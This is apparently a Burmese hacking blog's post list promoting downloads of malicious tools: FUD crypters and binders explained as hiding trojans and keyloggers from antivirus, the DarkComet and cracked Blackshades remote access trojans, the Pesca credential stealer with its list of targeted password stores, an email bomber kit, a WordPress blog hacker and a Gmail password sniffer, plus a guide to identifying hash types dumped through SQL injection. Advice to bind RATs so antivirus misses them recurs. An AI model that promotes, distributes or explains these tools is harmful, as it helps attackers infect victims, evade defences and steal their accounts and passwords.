ဖိုင္ကိုလိုသလို ခ်ံဳ႕လိုက္ႏိုင္တဲ့ေဆာ့၀ဲေလးပါ။ေဘာ္ဒါရဲ႕ ဆိုက္တစ္ခုကေတြ႔တာပါ။
အစတုန္းကေတာ့ ေတြ႔ ေတြ႔ခ်င္းကၽြန္ေတာ္က သိပ္စိတ္၀င္စားလွတယ္ ေတာ့မဟုတ္ဘူးဗ်။
ေနာက္ေတာ့မွစမ္းသံုးရင္နဲ႔မွ ေတာ္ေတာ္သေဘာက်သြားတာ။
မိတ္ေဆြတို႕လဲ သံုးခ်င္ရင္ေတာ့ေဒါင္းလိုက္ေတာ့ဗ်ာ။

Download 1
Download 2

Read More ->>

Crypter , Joiner and Binder အေၾကာင္း

Crypter
FUD Crypter ဆိုတာဘာလဲ သူတို႕ကနည္းနည္းဆိုးပါတယ္။သူတို႕ သင္တို႕ ရဲ႕ virus ေတြနဲ႕ Keylogger ,trojan ေတြကို တျခား junk data ေတြနဲ႕ ေပါင္းေပးမွာျဖစ္ျပီး antivirus ေတြမသိေအာင္ ျပဳလုပ္ေပးမွာျဖစ္ပါတယ္။ အဲလိုျပဳလုပ္ေပးတဲ့ဟာေတြကို Fully Undetectable Crypter ( FUD Crypter ) လို႕ေခၚပါတယ္။တစ္ခါတစ္ေလက်ေတာ့လဲ
Code ေတြကို Crypt လုပ္ပစ္ပါတယ္ ဘယ္လို Crypt လည္းဆိုေတာ့ Code ေတြကို အေပၚေအာက္ေရႊ ႔ သလို Goto Function သံုးတာမ်ိဳးေပါ့  တျခားနည္းေတြလည္း
ရွိပါေသးတယ္
အဲ့သလို Crypt ျပန္ရင္လည္း Size က ၾကီးသြားျပန္ေရာ Size ၾကီးရင္ ပို ျပီး ေျခရာခံရလြယ္မယ္ေလ ဒီေတာ့ ျပန္ေသးေအာင္ Pack လုပ္ရျပန္ေရာ Packer နဲ႔ေပါ့။.............................


Binder and Joinder
တကယ္လို႔ တျခားဖိုင္နဲ႔ တြဲ ထားခ်င္ရင္လည္း Binder ဆိုတာသံုးရျပန္ေရာ Bind လုပ္ထားတဲ့ ဖိုင္ကို Run တာနဲ႔ Trojen ကိုပါ အလုပ္လုပ္ေစတယ္ ဒီသေဘာပါ
အဲ့လို အဲ့လို Anti-Virus နဲ႔ Hacker ေတြဥာဏ္ခ်င္းယွဥ္ၾကပါတယ္




Result
ေအာက္မွာ ကၽြန္ေတာ္ Crypt ထားတဲ့ RAT တစ္ေကာင္ကို Online Scanner သံုးျပီးစစ္ထားတာပါ။

ဒါေတာင္ အန္တီဗိုင္းရပ္ေလးမ်ိဳးေလာက္က သိပါေသးတယ္။.....................ဒီေလာက္ဆိုရင္နာလည္
ေလာက္ပါျပီ။
မွတ္ခ်က္ ။         ။ဒီပို႕ကို Ghost area ကေရးထားေသာပို႕ႏွင့္ကၽြန္ေတာ္ေရးထားေသာ ပို႕မ်ားကို 
remix ျပန္လုပ္ထားသည္။    ။ဟဲဟဲ..................................အျပင္းတယ္ၾကီးတာကိုး....

Read More ->>

UnKnoWn Crypter V2.0 - 100% FUD

လာျပန္ပါျပီ crypter တစ္မ်ိဳး။ကၽြန္ေတာ္ကိုဒါေတြၾကီးပဲ တင္ေနလို႕တစ္မ်ိဳးမထင္ပါနဲ႕။ကၽြန္ေတာ္ ကအသံုး၀င္ မယ္ထင္လို႕ပါ။ဘာေၾကာင့္လဲဆိုေတာ့ ကၽြန္ေတာ္တို႕ၾကိဳးစားထားသမွ်ကို Anti virus ေတြသိကုန္ရင္ အလ ကားျဖစ္သြားမွာေပါ့။ေအာက္ကလင့္ကေနေဒါင္းလိုက္ပါ။။

http://www.multiupload.com/PJA8DLWOU7

Read More ->>

Hash Type မ်ားအေၾကာင္း

ပထမဦးဆံုး Hash ဆိုတာ ဘာလဲေျပာရေအာင္…။ ကၽြန္ေတာ္တို႔ Forum တစ္ခုထဲကို ၀င္တဲ့အခါ Password ရိုက္သြင္းလိုက္ရင္ အဲ့ဒီ့ Password ဟာ Web Server ကသတ္မွတ္ထားတဲ့ Table တစ္ခုထဲကို ၀င္သြားျပီး အဲ့ဒီ့ Password ဟာ Table ထဲက
Alogrithum အလိုက္ အသြင္ေျပာင္းလဲသြားပါတယ္ ဒီလိုေပါ့ f5d1278e8109edd94e1e4197e04873b9 ဗ်ာ သာမန္ ကၽြန္ေတာ္တို႔ရိုက္လုိက္တဲ့ ရိုးရိုး Password ကို Plain Text လို႔ ေခၚျပီး Hash Table က ထြက္လာတဲ့ ဟာကိုေတာ့ Hash လို႔ေခၚပါတယ္
ဥပမာ Plain Text ဟာ tester ျဖစ္ရင္ Hash ကေတာ့ လူဖတ္မရတဲ့ f5d1278e8109edd94e1e4197e04873b9 ေပါ့ Hash ကို ဘယ္ေသာအခါမွာ Plain Text အျဖစ္ေျပာင္းလဲလို႔မရေတာ့ပါဘူး Hash ကို Decrypt လုပ္ႏုိင္တယ္ဆိုတာ တစ္ကယ္ေတာ့လံုး၀မဟုတ္ပါဘူး
Plain Text အျဖစ္ေျပာင္းတာဟာလည္း Decrypt လုပ္တာမဟုတ္ဘဲ Brute Force လုပ္တာပါ ေနာက္မွ အဲ့ဒီ့ အပိုင္းကို ေသခ်ာရွင္းျပပါ့မယ္.။
ဒါဆုိ ဘယ္လို Access Gratiented ျဖစ္သလဲဆိုေတာ့ ကၽြန္ေတာ္တို႔ Plain Text အျဖစ္ရိုက္သြင္းလိုက္တဲ့ Pass ဟာ Hash Table ကုိ ျဖတ္ျပီး Hash ျဖစ္သြားပါတယ္ အဲ့ဒီ့ Hash နဲ႔ နဂို Password ကုိသတ္မွတ္တုန္းက Data Base ထဲမွာ သိမ္းထားတဲ့ Hash တိုက္စစ္လို႔
တူတဲ့ အခါမွာ Access Gratiented ျဖစ္ျပီး မတူညီတဲ့အခါမွာေတာ့ Access Denied ေပါ့ဗ်ာ
(တကယ္လို႔ ခင္ဗ်ားသာ Web Server ထဲက Password ေတြကို Hijack လုပ္ယူႏိုင္တယ္ဆိုရင္ Plain Text နဲ႔ ထြက္ေပၚလာဖို႔ ခဲယဥ္းပါတယ္ Web Server အမ်ားစုက Hash Table မ်ားနဲ႔ Crypt ထားတဲ့အတြက္ Hash ေတြပဲ ထြက္က်လာမွာျဖစ္ပါတယ္ ဒီလို Hash ေတြကို
ျဖည္ဖို႔ Hash Type ေတြကို သိိဖို႔လိုပါလိမ့္မယ္ )
ကဲ ဒါဆို Hash ဆိုတာ ဘာလဲ သိေလာက္ပါျပီ Type of Hash ဆိုတာေလးစရေအာင္
ပထမဆံုး အသံုးအမ်ားဆံုး Hash ျဖစ္တဲ့ MD5 Hash အေၾကာင္းစပါ့မယ္

MD5 Hash
MD5 Hash မွာ အလံုးေပါင္း သံုးဆယ့္ႏွစ္လံုးပါ၀င္ပါတယ္ ( 128 Bit Encryption ေပါ့ဗ်ာ )
a-z နဲ႔ 0-9 ပါ၀င္ပါတယ္
ဥပမာ – f5d1278e8109edd94e1e4197e04873b9
တကယ္လို႔ အထက္က အခ်က္ တစ္ခုခုနဲ႔မတူရင္ MD 5 Hash မဟုတ္ပါဘူး
SHA1
SHA1 Hash ဟာလည္း အသံုးမ်ားတဲ့ Hash Type ေတြထဲမွာပါ၀င္ျပီး ပိုမို လံုျခံဳမႈရွိပါတယ္
SHA1 Hash မွာ အလံုးေပါင္းေလးဆယ္ပါ၀င္ပါတယ္ ( 160 Bit ေပါ့ )
အရင္အတုိင္းပဲ a-z , 0-9 ပါ၀င္ပါတယ္
ဥပမာ – ab4d8d2a5f480a137067da17100271cd176607a1

MySQL < 4.1
ဒီ Hash Type ကေတာ့ MySQL Version 4.1 ေအာက္က Server ေတြမွာ အသံုးမ်ားျပီးေတာ့ ဒီ Type ကို ျမင္တာနဲ႔ Defacer ေပါက္စေတြဟာ ပ်ာယာ ခပ္တတ္ၾကပါတယ္
သူ ႔မွာ Character 16 လံုးပဲရွိပါတယ္ ( 64 bits ရွိပါတယ္ )
ထံုးစံအတုိင္း a – z  , 0 – 9 ရွိပါတယ္
ဥပမာ – 606727496645bcba

MySQL5
အရင္တုန္းက ကၽြန္ေတာ့္ကို ဒုကၡ အေပးဆံုး Type တစ္ခုပါ အဲ့ဒီ့ တုန္းက Hash Type ေတြကိုလည္းေသခ်ာမသိ Skill ကလည္းခ်ာေသး ( ခုလည္းခ်ာတာပါပဲ ) ေတာ့ ဟိုလူကယ္ပါ ဒီလူကူပါေပါ့ဗ်ာ ဟီး သူကေတာ့ ေနာက္ထြက္တဲ့ MySQL Version ေတြမွာ အသံုးျပဳပါတယ္
သူက ပိုဆိုးတယ္ဗ် Character ၄၁ လံုးရွိတယ္
အားလံုးက Capital Latter ေတြခ်ည္း
ျပီးေတာ့ ခရပြင့္ Star ( * ) နဲ႔ စသဗ်ာ
ဥမာ – *C8EB599B8E8EE7BE9F1A5691B7BC9ECCB8DE1C75

MD 5 ( WordPress )
ကၽြန္ေတာ္ အေၾကာက္ဆံုး Hash ပါ ဘယ္ေလာက္ထိလဲဆို SQL Injection လုပ္လို႔ Pass ကို ဒီ Hash ထြက္ရင္ လွည့္ကိုမၾကည့္ေတာ့ဘူး အဲ့ဒီ့ ဆိုဒ္ကို လက္ေလွ်ာ့ပစ္တယ္ အဲ့ဒီ့အထိဆိုးပါတယ္ ဟီး
သူ ႔မွာ $P$ နဲ႔စပါတယ္
0-9 A-Z a-z အစံုကိုပါပါတယ္
သံုးဆယ့္ေလးလံုးရွိပါတယ္
ၾကည့္လိုက္ပါ $P$9QGUsR07ob2qNMbmSCRh3Moi6ehJZR1

MD 5 (phpBB3 )
phpBB3 နဲ႔ေဆာက္ထားတဲ့ Forum ေတြမွာအသံုးျပဳပါတယ္
$H$ နဲ႔စပါတယ္
MD 5 WordPress လိုပါပဲ အစံုပါပါတယ္
Character သံုးဆယ့္ေလးလံုးရွိပါတယ္
ဥပမာ – $H$9xAbu5SruQM5WvBldAnS46kQMEw2EQ0
ကဲ ဒါဆို Hash Type အစံုကို သိေလာက္ပါျပီ
Source by Ghost Area

Read More ->>

[Free] FUD Crypter [Free] 100% FUD

FUD Crypter ဆိုတာဘာလဲဆိုတာကို ကၽြန္ေတာ္အရင္ပို႕ အေဟာင္းေတြတုန္းကရွင္းျပထားပါေသးတယ္။
နားမလည္ရင္ျပန္ေလ့လာလိုက္ပါဦး။ေနာက္ထပ္ပို႕ေတြမွာ ဒီအေၾကာင္းကိုျပန္ရွင္းျပျပီးျပန္ေရးေပးပါ ဦးမယ္။နာလည္တဲ့သူမ်ားေဒါင္းသြားလိုက္ပါဦး။


Main advantages:

• reliable encryption algorithm - TripleDES;
• high speed data processing;
• simple and intuitive interface;
• the ability of simultaneous encryption / decryption of multiple files;
• a separate interface for working with the text.

 Download url: http://easycrypter.com/download/easycrypter.exe

Read More ->>

DarkComet 4.2 Final RAT

Features
- Now server module doesn't melt each times
- SOCKS5 Server added - Multithread.
- Camera streaming is now more stable
- Camera capture interval added
- Camera disable streatch enabled/disabled added
- File Manager doesn't crash on transfer anymore
- Sound capture more stable and a bit faster
- New process manager GUI and more user friendly
- Process Dump added to the new process manager
- Screen capture totally recoded, faster in Vista and Seven than before
- Screen capture control more stable
- No more black screen in screen capture on resize (avoid using 16bit colors in some systems) Most performant is 8Bit.
- New password recovery plugin

Download လုပ္ရတာေတာ္ေတာ္စိတ္ညစ္စရာေကာင္းပါလိမ့္မယ္။ဘာလို႕လဲဆိုေတာ့  10.86 MB 
ေတာင္ရိွလိုကပါ။ဖိုင္းဆိုက္ကၾကီးတယ္လို႕မေခၚႏိုင္ေပမယ့္ေစာက္သံုးမက်တဲ့ connection ေၾကာင့္ပါ။
ေအာက္ကလင့္ကေနေဒါင္းလိုက္ပါ။ ဒါေလးသံုး ရင္ Binder ေလးဘာေလးေဆာင္ထားပါ။
အန္တီvirus ကသိသြားရင္ ထိပ္ေခါက္ခံရလိမ့္မယ္။
http://www.multiupload.com/3A0XZPPJVY

Read More ->>

Blackshades 4.2 RAT Cracked

 

စိတ္တိုင္းက်ေတာ့မဟုတ္ေသးဘူး RAT ဆိုတာဟက္ကာေပါက္စ(ကၽြႏ္ေတာ္တို႕လို)လူတိုင္းသိပါတယ္
စိတ္တိုင္းက်မဟုတ္ဘူးဆိုတာ သံုးစဲြရတာကိုပါ။
ေတာ္ေတာ္ဇယားရႈပ္ပါတယ္။ဒီေဆာ့၀ဲေလးကို တျခားဖိုရမ္တစ္ခုကရတာပါ။
မူရင္းကေတာ့ေအာက္ကလင့္မွာပါ။
http://www.l33thackers.com/Thread-Blackshades-4-2-Cracked
အဲဒီမွာ အသံုးျပဳပံုေတြေကာ ပါ ပါတယ္။
ေနာက္ျပီး RAT ေတြအေၾကာင္းပိုသိခ်င္ရင္ http://www.ghostarea.net ကိုသြားလိုက္ပါ။
ကၽြန္ေတာ္ကေတာ့ေစာက္ျပင္းၾကီးတယ္ဗ်။ရွင္းမျပေတာ့ဘူး။
ဒီေဆာ့၀ဲေလးကိုလိုျခင္တယ္ဆိုရင္ေဒါငး္လိုက္ၾကပါဦး။

Download
http://www.mediafire.com/download.php?9hb1a9j7dstac4c

Read More ->>

? BlaZer's Tool Kit - All in One Hacking Tools Pack : Free Download

Features:

★ Inbuilt Web Browser with Java Script and Flash

★ Email Bomber

★ Port Scanner

★ Screen Recorder

★ Pinger

★ Anti-Virus Finder

★ File-Downloader and much more.....




Requirements:

• Dot Net Framework

Compatible OSes

• Windows 7 (32 & 64 Bit) (Tested)..

• Windows Vista (32 & 64 Bit) (Tested)..

• Windows XP (32 & 64 Bit) (Tested)...

Features to Come

- Stealer..

- Keylogger..

- FTP Client..

- SQLi Helper..

- Admin Page Finder..

- Exploit Finder..
http://www.mediafire.com/?9qa37of7ihd1z
Password: ABlaZerBoTRelease

Read More ->>

Paki Hacking Tool kit

Paki Hacking ToolKit v 1.0 which contains Following Features:-

MD5 TOOL

Email Spam

SQL Tool

Encryption & Decrypter

ASCII Art

Ping Web

Google Dorks Scanner

Requirements

==>Require .Net framwork 4.0 to run this application.

==>And it will be run on All Microsoft Operating systems

==>Minimum requirement Windows Xp

==>Don't remove any file inside RES folder

DOWNLOAD

Read More ->>

Mr.Dark Soul's Wordpress Blog Hacker

အထက္ကပံုေတြကတစ္ဆင့္ျခင္းရွင္းျပထားတာပါ။
ပံုေတြကိုဒီထပ္ပိုျပီးဆိုက္ၾကီးၾကည့္ျခင္ရင္ေအာက္ကလင့္ေတြကေနသြားပါ။
http://i.imgur.com/BCXFD.gif
http://i.imgur.com/ywccU.gif
http://i.imgur.com/dhn43.gif
http://i.imgur.com/yJxc2.gif

Download
http://www.2shared.com/file/0hiKLwdP/MrDark_Soul_Wordpress_Blog_Hac.html?cau2=403tNull

Read More ->>

Pesca 0.75 local stealer Ftp+Mail+Php Uploader + Php logger

Steals:

* MSN Messenger
* Windows Messenger
* Windows Live Messenger
* Yahoo Messenger (5.x and 6.x)
* Google Talk
* ICQ Lite 4.x/5.x/2003
* AOL Instant Messenger (v4.6,6.x,Pro)
* Trillian
* Miranda
* GAIM/Pidgin
* MySpace IM
* PaltalkScene
* Outlook Express
* Microsoft Outlook 2000
* Microsoft Outlook 2002/2003/2007
* Windows Mail
* IncrediMail
* Eudora
* Netscape 6.x/7.x
* Mozilla Thunderbird
* Group Mail Free
* Yahoo! Mail
* Hotmail/MSN mail
* Gmail
*Internet Explorer 5.*
*Internet Explorer 6.*
*Firefox 1.*
*Firefox 2.*
*Firefox 3.*
*Dialup Passwords
*RAS Passwords
*VPN Passwords
*Outlook passwords
*AutoComplete passwords in Internet Explorer
*Password-protected sites in Internet Explorer
*MSN Explorer Passwords
* Login passwords of remote Computers
* Outlook 2003 Passwords of mail accounts on exchange server
* Password of MSN Messenger / Windows Messenger accounts
* Internet Explorer 7 Passwords of password-protected Web sites
*Steam Usernames
*Steam Password
*Icq 6 Username
*Icq 6 Hash
*Chrome Password *BETA*
*Wireless Keys
Dwonload 
http://hotfile.com/dl/119526205/2d2015e/Pesca_0.75.rar.html

Read More ->>

cracker software adm

ဒီေကာင္ေလးက cracker ေတြသံုးသင့္တဲ့ ေဆာင္ထားသင္တယ္ password ေတြေတာ္ေတာ္မ်ားမ်ားကို crack

လုပ္လို့လည္းရတယ္ database ကိုလည္း crack လူပ္လို့လည္းရတယ္ network password , internert password,

wifi password, ေတြcrack လုပ္လို့ရတဲ့အျပင္ sql sever ကိုလည္ေဖာက္လို့ရတယ္အျပင္ online ကေနျပီးေတာ့password, trace လိုက္လို့ရတယ္ ေတာ္ေတာ္ လုပ္ေဆာင္မွူမ်ားပါတယ္


သံုးျကည့္လိုက္ပါေတာ္ေတာ္ေကာင္းပါတယ္ crack ေတြ ပိုေတာင္ေဆာင္သက့္ေသးတယ္ေဒါင္းပါ
http://www.ziddu.com/download/17258193/ca_setup.exe.html

 အေပါ္ကဟာနဲ့မရရင္

http://www.mediafire.com/?bjtqgobzx3n5fx6
ဒါနဲ့ေဒါင္းေပါ့
အဆင္ေျပပါေစ

source @ myanmarhacking.multiply.com

Read More ->>

Hack Gmail and other mail

ဒါေလးကေတာ့ .NET နဲ့ ေရးသားထားတဲ ဟာေလးပါ ကိုယ္နဲ့  online မွာ ရွိေနတဲ့  gtalk မွာ ဆက္သြယ္ေနတဲ့

အျခားတစ္ေယာက္ကို ဟက္နိုင္ password ေတြရယူနိုင္ပါတယ္

သူကိုသံုးဖို့အတြက္ .NET fraimwork ေလးပါထည့္ေပးလိုက္ပါတယ္ ဟက္နိုင္တာ့mail ေတာ္ေတာ္မ်ားမ်ားကိုဟက္နိုင္ပါတယ္

လံုျခံုေရး ညံမေကာင္းတဲ့network အတြင္းမွာသံုးေနတဲ့ gmail အသံုးျပုသူေတြ၇ဲ့ password ေတြကိုအလြယ္တကူရရွိမွာပါ

ဒီေကာင္ေလး  gmail အသံုးျပုေနျပီ  လိုင္းမွာ ရွိသူေတြကိုသာ ဟက္နိုင္ပါတယ္

ဘာလိုလည္းဆိုေတာ့ သူက mail အသံုးျပုသူေတြဟာ သူတို့ အသံုးျပုတဲ့ mail sever နဲ့ သူတို့ရဲ့ network လိုင္းေတြcomputer ေတြနဲ့ ခ်ိတ္ဆက္ေနရပါမယ္ အဲ့ ဆက္သြယ္မွူ ကိုျကားဖ်က္ဖမ္းယူျပီး password မ်ားကိုရွာေဖြေပးတဲ့ software ေလးပါ  ဟက္ကာတစ္ေယာက္ဟာ အင္တာနက္မွာ ေတာင္ရွာေဒါင္းမရတဲ့

အဆင္ျမင့္ software ေတြရွိသင္ပါတယ္ software ကိုပဲ အားမကိုးပါနဲ့ လိုလည္းေျပာခ်င္ပါတယ္

  http://www.ziddu.com/download/17434699/webmailhacktool2.4.rar.html

ေဒါင္းမရရင္ ေနာက္တစ္ခုက
http://www.mediafire.com/?r477mxbek11zu27

password.......johnkarzime@gmail.com
source @ myanmarhacking

Read More ->>